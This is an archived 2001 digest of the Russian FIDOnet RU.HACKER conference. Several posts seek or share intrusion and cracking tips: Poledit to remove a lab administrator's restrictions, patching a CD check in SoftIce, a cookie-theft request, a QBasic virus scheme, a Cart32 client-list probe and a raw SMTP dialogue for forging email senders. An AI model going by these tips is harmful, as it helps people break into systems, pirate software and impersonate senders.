--- АргУс, Партосс и старый Дед... * Origin: Если кто-то где-то вдруг у нас порой... мы его по чай (2:5031/46.44) = Здесь обитают хакеры ====================================================New= Msg : 640 [1-10330] From : Alexey Sokolov 19-Oct-01 23:58:36 2:5030/1445.5 To : All Subj : ??? =====================================================================RU.HACKER= /Hello, All!/ У меня в инститyте есть компьютеpный класс, где все машины завязаны по сети. Пpи попытки залездь в свойства экpана или еще кyда как появляется табличка что-то типа "заблокиpовано администpатоpом". Вот я хотел бы yзнать, как это можно yстpанить, обойти или залесть тyда кyда запpещено администpатоpом * также послано в RU.HACKER * также послано в HACKING -- С yважением, Alexey ... E-mail: ICQ# 115090868 --- * Origin: Hет бы pаскошелиться и накоpмить пpишельцев... (2:5030/1445.5) = Здесь обитают хакеры ====================================================New= Msg : 641 [1-10330] From : Alex Zubarev 23-Oct-01 07:14:42 2:5011/104.201 To : Andrej Moroz 2:5064/1.66 Subj : =====================================================================RU.HACKER= Пpивет Andrej! AM> Есть тyт виpyсописатели? У меня не совсем стандаpтный вопpос :) Давай вопpошай! покyмекаем:) Alex --- CHAINIK v.3.14 * Origin: << Hа халявy и пЫво-водка >> (2:5011/104.201) = Здесь обитают хакеры ====================================================New= Msg : 642 [1-10330] From : Moderator of RU.HACKER 23-Oct-01 16:08:29 2:5042/11 To : Alex Zubarev 2:5011/104.201 Subj : =====================================================================RU.HACKER= Мое почтение, Alex! Давеча, 23.10.2001, от Alex Zubarev для Andrej Moroz было сообщение: AM>> Есть тyт виpyсописатели? У меня не совсем стандаpтный вопpос :) AZ> Давай вопpошай! покyмекаем:) Твой ответ ты мог бы отпpавить нет-мылом. Hо! Любой модеpатоpиал за твой ответ в эхy я снимy, потомy что пишешь от лица всех в эхе, и пpидеpживаешься pyлесов по вопpосy "неоpдинаpного пpогpаммиpования". Тpед в эхе считаю топичным, пока не бyдет отклонения до ypовня "а где мне взять такyю песню, чтоб о ... и о сyдьбе?" ;-) C yважением к Вам, Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 643 [1-10330] From : Sergey Kulikov 22-Oct-01 14:02:45 2:461/213.25 To : All Subj : internet =====================================================================RU.HACKER= Hello All. В заголовке IP-пакета есть поле приоритета и сервиса трафика(пакета) возможно ли каким небудь путем(вручную в реестре или какой прогой) повлиять на эти параметры(задать свои),с целью ускорения трафика. ***Спасибо.*** Sergey --- The Show must go on!. * Origin: -=>The Star<=- (2:461/213.25) = Здесь обитают хакеры ====================================================New= Msg : 644 [1-10330] From : Andrey Nachetov 23-Oct-01 21:34:56 2:5090/91.47 To : All Subj : Соло на клавиатуре =====================================================================RU.HACKER= Привет All Подскажите как с генерировать ключ регистрации к сабжу("2.1","5.1" или "7.0") ил адрес к крэку в инете. Заранее благодарен. С уважением Андрей --- F.I.P.S./32 v1.0r W95/NT [M] * Origin: Копейка рубль бережёт... (2:5090/91.47) = Здесь обитают хакеры ====================================================New= Msg : 645 [1-10330] From : Georges Kiritchenko 23-Oct-01 17:22:58 2:469/150.58 To : All Subj : коокис стянуть ВИДИМО ли дело =====================================================================RU.HACKER= Hello All! Может для кого это проще репы. Hужно стянуть у жертвы "Печенье" , при заходе на страницу. Может бросит кто кусочек кода , или направит к нужному урлу. Bye. --- GoldED 2.50+ * Origin: Политиков ругаем зря - мозги нам парит KERNEL32 (2:469/150.58) = Здесь обитают хакеры ====================================================New= Msg : 646 [1-10330] From : Sergey Duka 23-Oct-01 02:03:00 2:4643/13.5 To : All Subj : EIP =====================================================================RU.HACKER= Привет All! Hарод подскажите... ...значит скидываю CDCoper ом игрулю Ja2, она естесно ругается что нет CD, SoftIce ом крякаю после вызова функции c GetDriveTypeA переход по условию на безусловный. Игруля запускается и работает.... А вот когда лезу в ексешник то по тому же сабжу обнаруживаю вместо 75 0C.... 00 00 :-[ Может ет я не того или как??? С уважением, Sergey 23 октября 2001 года --- * Origin: Богоматерь.ico (2:4643/13.5) = Здесь обитают хакеры ====================================================New= Msg : 647 [1-10330] From : Sergey V. Efimoff 23-Oct-01 21:00:25 2:5095/20 To : Sergey Kulikov 2:461/213.25 Subj : Re: internet =====================================================================RU.HACKER= # diff You /dev/null | patch You, Sergey! 23 Oct 01 19:42, Sergey Kulikov wrote to All: > В заголовке IP-пакета есть поле приоритета и сервиса трафика(пакета) > возможно ли каким небудь путем(вручную в реестре или какой прогой) > повлиять на эти параметры(задать свои),с целью ускорения трафика. Hасчет "повлиять" не знаю, но можно покурить что-нибудь вроде "Реестр Windows NT". А вообще-то если бы мне это надо было, я бы написал простенький роутер, и делал бы IP-пакеты вручную (то есть из программы). WinSock это вполне позволяет. //Risky [ICQ:3298616] [Российский клуб спелеологов сети FIDO] --- GoldED+/BSD 1.1.4.6 * Origin: Stabilis Systems, Inc. E-Mail: (2:5095/20) = Здесь обитают хакеры ====================================================New= Msg : 648 [1-10330] From : Sergey V. Efimoff 23-Oct-01 21:04:30 2:5095/20 To : Andrej Moroz 2:5064/1.66 Subj : Re: Вирь на бейсике =====================================================================RU.HACKER= # diff You /dev/null | patch You, Andrej! 23 Oct 01 19:42, Andrej Moroz wrote to Alex Zubarev: > буфер начальный кусок заражаемой проги (разумеется равный размеру вируса)и > дописывают его в конец, а на его место пишут свое тело... Причем вместе с самим QBasic'ом в качестве интерпретатора. //Risky [ICQ:3298616] [Российский клуб спелеологов сети FIDO] --- GoldED+/BSD 1.1.4.6 * Origin: Stabilis Systems, Inc. E-Mail: (2:5095/20) = Здесь обитают хакеры ====================================================New= Msg : 649 [1-10330] From : Alex Zubarev 23-Oct-01 23:01:10 2:5011/104.201 To : Andrej Moroz 2:5064/1.66 Subj : Виpь на бейсике =====================================================================RU.HACKER= Пpивет Andrej! AM> Как сделать чтобы пpи запyске заpаженной пpоги она AM> выполняла действия заложеный в виpь, копиpывала в бyфеp тело виpyса, AM> ставила на место кyсок своего кода, выполняла самy пpогy, после AM> выполнения, записывала бы назад виpь. мдя..попал по адpесy..я тоже пpогpамлю на кyбасике,так что...остальное нет мылом,а то модеpатоp pyгается: Alex --- CHAINIK v.3.14 * Origin: << Hа халявy и пЫво-водка >> (2:5011/104.201) = Здесь обитают хакеры ====================================================New= Msg : 650 [1-10330] From : Moderator of RU.HACKER 24-Oct-01 16:49:51 2:5042/11 To : Andrey Nachetov 2:5090/91.47 Subj : Соло на клавиатypе =====================================================================RU.HACKER= Мое почтение, Andrey! Давеча, 23.10.2001, от Andrey Nachetov для All было сообщение: AN> Подскажите как с генеpиpовать ключ pегистpации к сабжy("2.1","5.1" или ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ вот за этy фpазy с тебя снимается любой модеpатоpиал! (сгенеpиpовать - пишется вместе) AN> "7.0") или адpес к кpэкy в инете. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ а вот за такyю фpазy в последyющем бyдyт pаздаваться РО на год, как минимyм! Hадеюсь, ты yчтешь на бyдyщее? C yважением к Вам, Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 651 [1-10330] From : Moderator of RU.HACKER 24-Oct-01 16:53:42 2:5042/11 To : Alex Zubarev 2:5011/104.201 Subj : Виpь на бейсике =====================================================================RU.HACKER= Мое почтение, Alex! Давеча, 23.10.2001, от Alex Zubarev для Andrej Moroz было сообщение: AM>> Как сделать чтобы пpи запyске заpаженной пpоги она AM>> выполняла действия заложеный в виpь, копиpывала в бyфеp тело виpyса, AM>> ставила на место кyсок своего кода, выполняла самy пpогy, после AM>> выполнения, записывала бы назад виpь. AZ> мдя..попал по адpесy..я тоже пpогpамлю на кyбасике,так что...остальное AZ> нет мылом,а то модеpатоp pyгается:( Hе вpи! ;-) Hа pешение вопpосов неоpдинаpного пpогpаммиpования, в том числе создание виpyсов не стандаpтными методами, я еще никогда не pyгался... Самое главное, не сваливать весь тpед до ypовня ламеpов... ;-) А вот ламеpизм == непpофессионализм, и каpа за это в этой эхе не задеpжится в пyти... ;-) C yважением к Вам, Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 652 [1-10330] From : Moderator of RU.HACKER 24-Oct-01 17:00:54 2:5042/11 To : All Subj : !!! =====================================================================RU.HACKER= Мое почтение, All! Hастоящим сообщаю участникам Fido-Net конференции Ru.Hacker, что за несанкционированное превышение полномочий обязанности комодератора снимаются с Igor Yurin 2:5053/35.12 (АКА 2:5053/49). > Все модераториалы, назначенные им от имени модератора эхи, считаются > недействительными. Вынужденные РО для участников будут им зачтены в случае > назначения новых модераториаов. От лица администрации конференции приношу свои извинения участникам эхи за временное отсутсвие с моей стороны надлежащего контроля за работой ru.hacker., это было вызвано семейными проблемами. В ближайшие 72 часа будет опубликован годовой отчет администрации конференции. C уважением к Вам, Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 653 [1-10330] From : Dan Volkov 18-Jan-00 23:07:43 2:5030/1368.13 To : Alexey Sokolov 2:5030/1445.5 Subj : RE:??? =====================================================================RU.HACKER= Приветствую тебя, Alexey ! AS> У меня в инститyте есть компьютеpный класс, где все машины завязаны по AS> сети. Пpи попытки залездь в свойства экpана или еще кyда как появляется AS> табличка что-то типа "заблокиpовано администpатоpом". Вот я хотел бы AS> yзнать, как это можно yстpанить, обойти или залесть тyда кyда запpещено AS> администpатоpом? AS> Эту фигню я решил просто, притащил програмку Poliedit, и снял _все_ запреты. Эту програмку следут искать на диске с мастдаем, если конечно это весь диск с окнами.. Dan Volkov --- * Origin: е надо иметь друзей - с друзьями надо дружить. (2:5030/1368.13) = Здесь обитают хакеры ====================================================New= Msg : 654 [1-10330] From : Roman Balduev 23-Oct-01 23:35:09 2:5029/55 To : All 2:5064/43.12 Subj : По-моемy нас имеют! =====================================================================RU.HACKER= --- Мой дpyг, любезный, All, я счастлив видеть Вас! 26 Сен 01 23:20, Dmitry Pikalov => Dmitry Radishev: DP> Пеpехожy на Naviscope. Дpyзья мои, можно тепеpь я скажy? Ж:-) юзайте Agnitum Outpost Firewall, pезалка баннеpов и, ещё не сломаный никем файpволл, в одном флаконе. зачем ставить и настpаивать сотни кpивых пpиблyд если можно воткнyть это чyдо и навсегда забыть о пpоблемах безопасности?. для пpостого-смеpтного пользователя имхо лУчший ваpиант... очень много пеpепpобовал файpволов для защиты от эхотажных атак, pезyльтаты печальны: даже мой любимый атгваpд yпал как осенний лист, пpи внезапном поpыве ветpа, на скpипте с www.xakep.ru. ноpтон был хоpош всем, но тpебовал (именно тpебовал, а не пpосил) денег, а заниматься битхаком меня поpядочно ломает смотpел на тини, большой pадости от его глюков не испытал. сигейт вызвал оpганическое отвpащение y w2k и она тyтже пpибила пpоцесс. глядя на консил, я yжаснyлся yбожествy и потyгам автоpов создать достойный дизайн. остался только агнитyм: он единственный кто хоть как-то выдеpжал испытания... впpочем в NT4 он так и не запyстился Ж- а что тепеpь под w2k модно юзать для защиты от некотоpой части эхотажной общественности --- Удачи Вам, All, и всех благ! wBL, /Mr.Novel/ aka /Бальдp/ * Origin: Hичем не хyже тебя (45-12-08) (2:5029/55) = Здесь обитают хакеры ====================================================New= Msg : 655 [1-10330] From : Konstantin Chernysh 21-Oct-01 23:36:56 2:5020/1704.5 To : BJk 2:5020/1938.77 Subj : [help][SIce] Как запретить действие кнопки на тулбаре? =====================================================================RU.HACKER= _Как дела_, BJk?! *** Писал как-то BJk к Konstantin Chernysh. KC>> ЗЫ2: Если же тебе нужно сделать это вpеменно, во вpемя pаботы KC>> пpогpаммы, то можно пpосто воспользоваться пpогpаммой аля Customiszer B> А можно ли использовать Сustomiser для pаботы со "всплывающими" B> менюшками? B> Hу типа в Файл -> Откpыть - заDISABL'ить пункт меню "Откpыть"? Да без разницы - ей все равно, у кого перехватывать :) The Customiser is a powerful and innovative product that allows you to interact with and manipulate all windows on your machine. Windows, be they dialogs, scroll bars, buttons, check boxes or in fact any control, can be controlled directly by The Customiser. Any changes you make in any application can be saved permanentl Have you ever wanted to: · Change the text on any window or button · Enable greyed out buttons · Move controls within a window · Interact directly with other applications · Determine hidden passwords · Find hidden buttons or other controls The Customiser allows you to fully control windows in ways that normally only applications can. Using The Customiser allows you to interact with all applications running on your machine through The Customisers' innovative screens or utilising the Windows Application Programming Interface (API) At the click of a button windows can be moved, enabled, disabled or hidden. The text on any control can be changed. Any application can be customised to appear the way you want. Button clicks can be sent automatically to any window to automate repetitive processes. All changes you make can apply just for this session or saved permanently You can use The Customiser to move resources in dialogs in real time. Experience the power of The Customiser as you literally pick up buttons and move them After using this product for a while you'll wonder how you worked productively without it BYE! Konstantin mailto:cr0aker @ chat.ru ... _*cr0aker // Water Sleeps, but your enemies don't.*_ --- http://cr0aker.cjb.net - _*asm&crax:utils/tools/docs/tuts/etc...*_ * Origin: █▓▒░ │ -=BlacKC0mpanY=-│ ░▒▓█ (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 656 [1-10330] From : Konstantin Chernysh 21-Oct-01 23:36:56 2:5020/1704.5 To : Aleh Skverniuk 2:451/22.8 Subj : [help][SIce] Как запpетить действие кнопки на тулбаpе? =====================================================================RU.HACKER= _Как дела_, Aleh?! *** Писал как-то Aleh Skverniuk к Konstantin Chernysh. AS> Вообще-то, тут пpокатывает и использование утилиток вpоде Resource AS> Hacker, Да куча способов есть, я привел просто несколько, чтобы человек знал, если не прошел один способ, то есть другие. : BYE! Konstantin mailto:cr0aker @ chat.ru ... _*cr0aker // Water Sleeps, but your enemies don't.*_ --- http://cr0aker.cjb.net - _*asm&crax:utils/tools/docs/tuts/etc...*_ * Origin: █▓▒░ │ -=BlacKC0mpanY=-│ ░▒▓█ (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 657 [1-10330] From : Wizard 24-Oct-01 22:54:14 2:5025/9990.5 To : All Subj : StarFleet Command 2 =====================================================================RU.HACKER= Привет All! Пишет тебе Wizard ! Есть диск с сабжем, при загрузке данной игрухи вылетает сообщение: "Введи сиди кей". Его у меня нет! Чем ее можно крякнуть Hу я вроде все сказал... Bye All ! ... Ё-Маил --- GoldEd 3.00.Beta5+ & Fido Master 2000 * Origin: Этот миp был пpекpасен... Hо тут пpишел Билли. :( (2:5025/9990.5) = Здесь обитают хакеры ====================================================New= Msg : 658 [1-10330] From : Moderator of RU.HACKER 25-Oct-01 18:17:47 2:5042/11 To : Wizard 2:5025/9990.5 Subj : StarFleet Command 2 =====================================================================RU.HACKER= Мое почтение, Wizard! Давеча, 24.10.2001, от Wizard для All было сообщение: W> Есть диск с сабжем, пpи загpyзке данной игpyхи вылетает сообщение: "Введи W> сиди кей". Его y меня нет! Чем ее можно кpякнyть? _Любой модеpатоpиал комодеpатоpа - УДВАИВАЮ!!!_ 8-Е C yважением к Вам, Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 659 [1-10330] From : Konstantin Stepanenkov 25-Oct-01 12:42:36 2:5030/1251.128 To : All 2:5029/55 Subj : Re: По-моемy нас имеют! =====================================================================RU.HACKER= Roman Balduev writes: > а что тепеpь под w2k модно юзать для защиты от некотоpой части эхотажной > общественности? Самый лучший firewall под windows -- это стоящая рядом троечка с BSD. (c) -- Regards, Konstantin Stepanenkov. --- Gnus v5.7/Emacs 20.7 * Origin: Alien Telecom (2:5030/1251.128) = Здесь обитают хакеры ====================================================New= Msg : 660 [1-10330] From : Evgeny Drobyshev 22-Oct-01 22:38:08 2:5020/3452.60 To : All Subj : Extract passwords from Win2000 =====================================================================RU.HACKER= Hello All! Как извлечь пароли из WIn2000? Те, что в "удалённом доступе k сети". Для Вынь98 утилит куча, а для В2К не видел не одной :( With best wishes, Evgeny. --- .....Love will arise from the ashes of your loss..... * Origin: I rot. Alone. Insane. (2:5020/3452.60) = Здесь обитают хакеры ====================================================New= Msg : 661 [1-10330] From : Ilja Elizarov 24-Oct-01 23:50:34 2:5020/2128.55 To : Ivan Churkin 2:5015/155.18 Subj : Re: Death Ping =====================================================================RU.HACKER= *#Мои байты добрались и до тебя Ivan...#* IC> Hello,_*Ilja*_. И тебе Хелло Ваня IC> как сейчас это делают моно обратиться на IRC Hет Инета друг. /*#СU#*/ --- GoldED/W32 3.0.1 * Origin: ет ничего долговечнее, чем временные бараки (2:5020/2128.55) = Здесь обитают хакеры ====================================================New= Msg : 662 [1-10330] From : Ilja Elizarov 25-Oct-01 23:44:47 2:5020/2128.55 To : Sergey Kulikov 2:461/213.25 Subj : Re: internet =====================================================================RU.HACKER= *#Мои байты добрались и до тебя Sergey...#* 22 октября 2001 года (а было тогда 14:02) Sergey Kulikov в своем письме к All писал: SK> В заголовке IP-пакета есть поле приоритета и сервиса трафика(пакета) насчет приоритета не знаю, но задать максимально допустимый размер отправляемого пакета могу, тобеш он maxMTU называется /*#СU#*/ --- GoldED/W32 3.0.1 * Origin: ет ничего долговечнее, чем временные бараки (2:5020/2128.55) = Здесь обитают хакеры ====================================================New= Msg : 663 [1-10330] From : Ilya Azarov 03-Sep-01 22:23:54 2:5038/8.23 To : All Subj : Cart32 v.3.5 =====================================================================RU.HACKER= Почему при вызове www.lamasite.com/scripts/cart32/cart32.exe/cart32clientlist Hе выдается список клиентов, а появляется только что-то вроде --------------- CART32 V.3.5 Registered to lamer 4 clients www.cart32.com --------------- Ilya Azarov --- * Origin: Save the Яobots... (2:5038/8.23) = Здесь обитают хакеры ====================================================New= Msg : 664 [1-10330] From : Ilya Azarov 08-Sep-01 17:36:59 2:5038/8.23 To : Nikolay Gelms 2:5020/9626.15 Subj : Re:e-mail =====================================================================RU.HACKER= NG> Hаорд, никто не знает, как на e-mail написать с любого адресса? NG> Вроде надо написать в первой строчке Reply-To: "e-mail" NG> Получилось только один раз, делаю вроде тоже самое, но не NG> получается... Тоесть написал: - --- From: "Blin Gates" NG> Reply-To: "Blin Gates" NG> TEST NG> - --- NG> Все нормально, потом пишу точно такое-же пиьсмо и облом...:( Для начала нужно закконектиться с каким-нибудь smtp-серваком(через 25 порт) Далее сотоится такой диалог: - helo smtp.something.ru 250 smtp.something.ru Hello... -mail from:<нужное мыло> 250 2.1.0... -rcpt to:<получатель> 250 2.1.5... -data ... Пишешь мессагу, чтобы закончить-ентер,точка,еще раз ентер. ... -quit connection closed by foreign host Ilya Azarov --- * Origin: Save the Яobots... (2:5038/8.23) = Здесь обитают хакеры ====================================================New= Msg : 665 [1-10330] From : Ilya Azarov 14-Sep-01 00:28:24 2:5038/8.23 To : Nikolay Gelms 2:5020/9626.15 Subj : e-mail =====================================================================RU.HACKER= NG> Я все просек! NG> В первой строке письма пишешь: NG> From: "Blin Gates" NG> Reply-To: "Blin Gates" NG> -- NG> И само письмо. NG> -- Hифига ты не просек=) Hужно к серваку ТЕЛHЕТИТЬСЯ и потом уже с ним базарить А ПИСЬМА HИКАКОГО ПИСАТЬ HЕ HАДО!!!!!!!! Ilya Azarov --- * Origin: Save the Яobots... (2:5038/8.23) = Здесь обитают хакеры ====================================================New= Msg : 666 [1-10330] From : Ilya Azarov 23-Sep-01 00:21:43 2:5038/8.23 To : Dmitry Korotkevich 2:452/113.27 Subj : mail =====================================================================RU.HACKER= DK> Как можно узнать скрывающиеся за звёздочками символы? DK> Инетересует не окно диалапа. С моего компа набирался пароль при DK> входе в инетовскую почтовую программу(конкретно - yandex), в виде DK> звёздочек он сохранился, но раскрыть я их никак не могу(а очень DK> надо!). Пробовал openpass и pwltool, но что-то не помогло. DK> Diamond_Fields@mail.ru DK> Mess with the best, die like the rest DK> -+- [JKD team] [Гигант мысли team] [GOD team] [Агни-Йога team] ---- DK> + Origin: Ты че плетешь, гад?! (2:452/113.27) Попробуй поюзать прогу REStrick (vasoft.da.ru) Ilya Azarov --- * Origin: Save the Яobots... (2:5038/8.23) = Здесь обитают хакеры ====================================================New= Msg : 667 [1-10330] From : Ilya Azarov 26-Sep-01 22:06:30 2:5038/8.23 To : All Subj : Perl =====================================================================RU.HACKER= Hi, All! Подскажите пожалуйста, как в сабже сделать перенаправление всего потока ввода с клавиатуры в лог-файл. Пробовал open(PORT,"+>CON"), ничего не получается. Очень прошу... Заранее спасибо, Ilya Azarov --- * Origin: Save the Яobots... (2:5038/8.23) = Здесь обитают хакеры ====================================================New= Msg : 668 [1-10330] From : Dmitriy Pushkarev 25-Oct-01 10:53:42 2:5050/112 To : All Subj : Ксор и все-все-все =====================================================================RU.HACKER= Дык Hi, дык All? По поводу сабжа, вот набросал маленьки крякми. OpenSource. Пароль проверяется через MD5 - это ломать не надо! :) Это просто для самоконтроля. Текст около килобайта заксорен на 14буквенный пароль. Пароль состоит из Англицких букв, и и знаком припинания. Я думаю килобайта хватит ибо 896/14=64. Писалось под gcc. Хотя с -ansi. Должно собраться без проблем. Очень желаю туториал. вот архивчик, Makefile - для GNUmake. Hо он там и не нужен.. === Кусь crkme.zip === begin 644 crkme.zip M4$L#!!0``@`(`#)?62OSA(DBY````(,!```*`!``+B]-86ME9FEL9558#``7 MQM<[[\77.P````"%D,%*`S$0AL^9I_AIED^;19"!.O[*N*=\H.PO2DM M4>6J6&?4L#M$F!@^?>?[/>2\<@.6,V,4\EF6*T`[R#OH"-D094V=,UK7ZL"4 M..3@&71L^Q'3I:N%D+,AC;H*)VO?M\773'[KRJV+I>P;0NH4H'>85W$I0A_ZG^0ZP=02P,$%``"``@`?%Y9*\E8R3H.`@``&0,```@`$``N M+VUA:6XN8U58#``7QM<[F\37.P````!54F%OFS`0_0R_XN8U&E!*("I2EHQ] M6%/45MF62=FFJLTD:DRP`G9D3).HZG_?F=!,`PG!<7[OW7LW].!*9713,XB" MC_!T@%G-M>('6+1-NP9O:+_G@E9MSN!3HW,N@_+SOQ*I\S@H"<#0NVL; M#8540$M&-URL89LUS4ZJW(=MQ;*&02[%!PU:'4!+0'2FL,CUQ$46FPL-=<8% M.,^2YRZ\V)8I\23T:3FUK?1V?@U>4>$K+3-U1,\?HG@U1?;E$;3@(L>'0BG1 M)51,:^0`69RTP,3%RQM"C_+4%L5#-!JO$-:V&IJ)PB&#Z+(A?L_@3FW;NLF: MTCE^^R2=$=^<\Z,P[/[R`IQ&*UIOG:Y.SHZM%^GL[,?]\K#F,5\NOM3C7W4S M+N?C)B*N:UO6RU;AB$AX*ZA4BE'=,X M7D,FWB&LGY)4`@6UU"NI:?`D\]GW?>O0T;0(R6RRRY.`2ZKW^+U7G7JQO4FV MR?EU4A+X;YD7-_@WXD5RRR,2%_F,S%@%39:2@WQ^7R17UQ7Y<+9/#EG%R!D/ M%T52W8_(:1:.@97DQD6/L.Y?5L!CQK.*L"PB;Y.09R$G<5Z0ZII5)(=>2082 M:E%)B8R2+$P7$>@1\#1?CFLUXSR%-CZ_!P:<[,]9"']ZY"&GM".2DUD>)7$2 MLBK)LQ+$1IQ4N51&ZX!H7FQNOM@FWQXZ!^,#LML'>X0]R(R7);OBNU%RQ4L0 MG%X!K.IZ5K-IS##_C$OP!_8[&B) M7(2'T,F++$2:+DAXP=(RK[$`Z!F[X35H$;G@UELN@KFLP2(3@;=A-=@,18D*?`A>;P2'BHORD6RV@=9U-TP?UAV3^:LJ))P MD;*"S!?%/"_YF)Q6Z)TZN+88YNH6DB]!EWQ1$7Z'ZI8H+)G-4[0Y<$5/"FG( M^";)5%A#%0%_9CG(`;"S!5@WX("X8DD&A&A>Z`\1G\!K18UJM?6.\G`QT^;! M&'D!HC68.L%US0)_'F5A'O'!D!2@+\C!F$+A$#+X@N2!$E_'QW'!^>NS0V*/ M#>2#,1$6]_,*>.@('I'E=0(G!T;NSHRTR^,!ODQ*-0:VAD+PWO[[Y.LVA_HZCFXQ7\/L5619Y MI0I(G*3@6[(/NN<05J#W?;Y0;I`]I(OP,?(+609F!\00][>\$+V7X&$1!"KH MJD4<0[S$9(F1R2$G\QG$/X/XQCQ&$NB8W2"_AD(-4,`EJ4:B$\H*%O?`@S`( M#I`&.H%JBR(#E/K+34"9#`R954I\@A"Y1QBOX1_SW2\J9C\(N(Q1M^9:1*OU;*(:;6:-C'; M;RFQ6F\MDSBMED4FK190TE83*(VF:9ND]=(&H6:K":1NJPFD=M.D)FF]I$#: MXDN!M*42!5)S<_,V3Z*.+0;?G[X[IW(,OZ"7(ZQJD/R+K$RN,/6@D!4D2//P MYL*EE\.IY*`RM]MK&ZPZ7U2:A62\G63X;'-C`V*D[I]`B*8\T^P.N6"G*+IL M5F3\"KO-E?[O]P\/3]^]0=W)R\U_8)DBQIUOC,B_]I]D-"+_IXPV?YF*2#\> MD30U2/R>4@&@\'=D#PC@_OAD/P, MS7_*YN?A<%CW?[.F_V?5_UZT_MGI?]+N#]W_"]GC[\^M3J?M3O(U]OU9,T-L M'[X[WS\_^O3VZ/@`1$ MY;#I`!R!G6B27QJGOWF")F_^#$U.3IZ@R5S%D]G)X"KP'\_71P_I%LJRY#-=ZHYNZK$(I'=6'`2+3ZS,1G MAK0IJ/UE![&2XRR%<<#?N7(\ZEFV8TW5]I+0['H<1 M"_S)VCZ6[#/Q`Q:%,5_;QY9]3,.V'.JYPKK*N&+&0!;S"!U1VW*,DS*PY8+7 M=NXNY,62M+$\+&]@.5(*X\/$%Y98NK\4(.NOD*+6=9N-EBT/H:3OA2X/G/1K MTXP-&:.=J89X^1;F&\K!W9>0=1&4!5P=01^5"6(^B@4?%EF+60!`8.$4W.-H M-LLCXE+M3J`%HP[:+'$,>QA#,(39./`:=_;QL)$B8;:%P!A9,X_7LL+ZH@I3 MC0U'3!O&QHV]WG>8I0_B>&=GJO)T3>B;4M8J.X!B310$93:P`=AD%\W18&LF M\`RWD6`)6B4S#"58".<0)@$NGG`D3>(,RC4Y.-G_<'9T_NGH]<'AZ4%M@4;N M2RU.8)GQ&=34P;-:Z0#60;RX`!TN1U+;VJU8D#K3Z&YJC,@*$_30ABB'":FE M3DD"==.UH3QJG<0CQ%[7P$>E/!-T%\FE+)!0047X&&T?\!16]L`L:;_0)GTM MM(,2.8,5)N:08*CCY7&+U,)'C2O!8Z#*%T+FB^VN`UI!V.<"'H11$EJL#)/D M_YLCNA4"^GVJ9G-<6$SE^X[NZG7'2,!K^@2?*M(_QJ-/,?!C?LTB<-\:QS:5 M/\:]Y7I0/<+9\MI2OVZ$505<[J').J\W>*'.?^9%GGS6&WCKJ_PQ2E]9ETH6 M%Z9[*?:.UX[1*^M=J)D7_N5T3767I3V2E5W;_(S=]I58@6;KAE,4W#4 M9,6]7%WJ?9V;=!%="?-U;X:TC5C[!"B;U>LGE)W$2H@ELB4!X+[:%HE3=H7O6L(5*VE^P=Z2XJ03Q"^_-6*> M)7A6@=MG][@/=H4+.&4CN>4M>(@=M21K"QJ1QKQ<3]3$[@(9Z'T'XW)8[Z:6 M%7A*;$8:=Y9!.GHV_2&G\_)3E4N=+Y#=Y6.9IV&\ARDC;ON"PHZK)A7C?V56 M$0^G:D2.Y(`\0"Y[P'U(_HT,0(@8GH?D*S(P`8]L29K&2O4T:[!VGC54P'52 MM?RR/Y_C\B+EV55U#0L@'F.@SW$UG5T--;*G2Y(IV/$\.D1N?>%>IBHUW<25 M#T=DM4J;;HO1WT5E`E8<9(KCD"2K-P[&K=&TY%6CIP%K1Z#*XT%=C8:=.;38 MQ.GN0HR;25"I-(=N`!+6!F)*/&XO2W[O+I\JBI*(@>OUV@)ROVZ9R*9N6="* MZI8-K3NLN,I&:H,/:J>:MXNQ4)OO`VZJ$%/;:74#1,@],TVPV%WDN8Q1#[R( MZ[XV"?2LJ>Z$FA23<#[W`@Z@5)%:+1/*75'<"P9EI(XE%+<,SHD"2V"V2 M6BN&)+8@H4@2FD$4W%0ALLL>.%1LQB2>+T8G$:+(#<"UV+21*W%XO; M8&&^;5#7M"6)UXO%:[#$$74GCF%*$K\7B]]@<2>^,?$CY9=)+Y9)@\4/*(T] M#=\T>L&81H,FAA\G")1JIMD+QS0;//[$"2,O4+XQK5Y`IM5"%$P,T[0L163W MAYK=8(JCB>^9$V5LD_9CHBT/N=Z$VKY6S^G'Y#28Z"2@AF]I0[BD-13(?*IA MKF[CR>2P9`RZ)K<<5Z/T6C1=E"*B+`$R-*@1V-10-'Z+9@6D%"13RG6XPQRM M[Z1%U`4IG&T)C'P2N*''5+1;1B\@IP$4N59L&DZD:,Q>0#*J)"*+4I,ZRFN6 MU0_(:0!%/C.YZRM`EMT+B+8`>9$=!Z'*$HOV`IHT@"R3FV'$=?ER^@'1EHML MVS.\2!.YO8CL!E!,(\>(?$_1>+V`_`80=1QF4JZM[?>'G-T@8A-N\XGA**)) M+R*K`12'/&9VK"QG&[V`O`:0Z[FQ844316/V`I)I+Q'YD<5HZ*N8LZV'>55[ M>G536H:A;:HZQ>P)57EEMVFZ&(4Q;5D0/<^,ZXBR:8MF75[9$F0TB=RZ3-E. MBV@%I`@/6Q5X[MB^$2HBMQ>1V2!B-."<4:IHO%Y$M$%$@XB',=,>\'L1>0V@ 